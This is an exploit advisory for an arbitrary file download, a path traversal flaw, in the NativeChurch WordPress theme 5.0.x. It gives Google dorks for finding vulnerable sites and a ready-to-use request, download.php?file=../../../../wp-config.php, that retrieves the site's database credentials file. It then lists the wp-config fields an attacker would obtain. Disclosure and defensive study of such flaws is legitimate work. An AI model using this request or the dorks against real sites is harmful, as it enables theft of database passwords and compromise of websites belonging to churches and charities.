WordPress NativeChurch Multi-Purpose theme version 5.0.x suffers from a file download vulnerability.
e1ba0b34f0cfbec0bb491b38b3371e39
####################################################################
# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link :
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x
Compatible with Bootstrap 3.x - bbPress 2.5.x
From WooCommerce 2.1.x To WooCommerce 3.4.x,
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
inurl:''inurl:/wp-content/themes/NativeChurch/download/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
NativeChurch is a powerful WordPress Theme designed & developed for Church,
Charity, Non-Profit and Religious Websites and comes handy
for Portfolio/Corporate Websites as well.
####################################################################
# Impact :
***********
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers
download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context
of the web server process. Information obtained may aid in further attacks.
Attackers can use a browser to exploit this issue.
* The software uses external input to construct a pathname that should be within a
restricted directory, but it does not properly neutralize sequences
such as ".." that can resolve to a location that is outside of that directory.
####################################################################
# Arbitrary File Download Exploit :
******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
# Example Informations about MySQL WordPress Configuration File :
***********************************************************
/** Nom de la base de donnees de WordPress. */
define('DB_NAME',
/** Utilisateur de la base de donnees MySQL. */
define('DB_USER',
/** Mot de passe de la base de donnees MySQL. */
define('DB_PASSWORD',
/** Adresse de l'hebergement MySQL. */
define('DB_HOST',
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################